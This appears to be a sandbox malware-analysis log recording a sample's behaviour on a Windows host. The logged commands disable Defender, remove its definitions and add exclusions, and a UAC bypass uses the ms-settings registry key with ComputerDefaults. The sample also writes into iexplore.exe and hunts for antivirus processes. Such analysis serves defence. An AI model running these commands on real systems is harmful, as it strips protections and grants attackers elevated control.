                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 31D0008
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_009F1B4D
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_0099338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0099338B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009FBBED SendInput,keybd_event,10_2_009FBBED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009FEC9E mouse_event,10_2_009FEC9E
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Local\Temp\bound.exe Process created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009F14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_009F14AE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009F1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_009F1FB0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1669698416.00000000027E5000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000000.1701584318.0000000000A53000.00000002.00000001.01000000.00000005.sdmp, End.pif, 0000000D.00000002.1881518198.0000000000A53000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: End.pif, explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2004637207.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009B0A08 cpuid 10_2_009B0A08
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\ucrtbase.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_lzma.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_sqlite3.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_socket.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_hashlib.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_queue.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\ucrtbase.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
